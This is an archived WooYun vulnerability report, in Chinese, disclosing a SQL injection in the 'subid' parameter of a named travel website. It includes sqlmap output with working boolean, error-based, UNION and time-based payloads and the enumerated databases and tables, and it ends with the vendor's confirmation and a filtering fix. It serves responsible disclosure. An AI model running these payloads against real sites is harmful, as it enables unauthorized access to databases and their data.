乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-07: 细节已通知厂商并且等待厂商处理中 2015-09-07: 厂商已经确认,细节仅向厂商公开 2015-09-17: 细节向核心白帽子及相关领域专家公开 2015-09-27: 细节向普通白帽子公开 2015-10-07: 细节向实习白帽子公开 2015-10-22: 细节向公众公开
RT
存在注入 url: http://www.ailvxing.com/e/visa/index.php/?enews=showsample&subid=59
[00:12:13] [INFO] resuming back-end DBMS 'mysql' [00:12:13] [INFO] testing connection to the target URLsqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: subid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: enews=showsample&subid=59 AND 8252=8252 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: enews=showsample&subid=59 AND (SELECT 8039 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SELECT (CASE WHEN (8039=8039) THEN 1 ELSE 0 END)),0x7170706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: UNION query Title: MySQL UNION query (NULL) - 3 columns Payload: enews=showsample&subid=-7145 UNION ALL SELECT NULL,NULL,CONCAT(0x7178707671,0x6e6f4e4177536f426967,0x7170706a71)# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: enews=showsample&subid=59 AND SLEEP(5)---[00:12:13] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Apacheback-end DBMS: MySQL 5.0[00:12:13] [INFO] fetching database names[00:12:13] [INFO] the SQL query used returns 4 entries[00:12:13] [INFO] resumed: information_schema[00:12:13] [INFO] resumed: ailvxing2015[00:12:13] [INFO] resumed: ailvxing_update[00:12:13] [INFO] resumed: testavailable databases [4]: [*] ailvxing2015[*] ailvxing_update[*] information_schema
Database: ailvxing2015 [380 tables]+----------------------------------+| alx_alx_accitem || alx_alx_acckemu || alx_alx_agent || alx_alx_booking || alx_alx_cardname |...... 不全部展现了
变量过滤。
危害等级:高
漏洞Rank:20
确认时间:2015-09-07 10:47
非常感谢!
暂无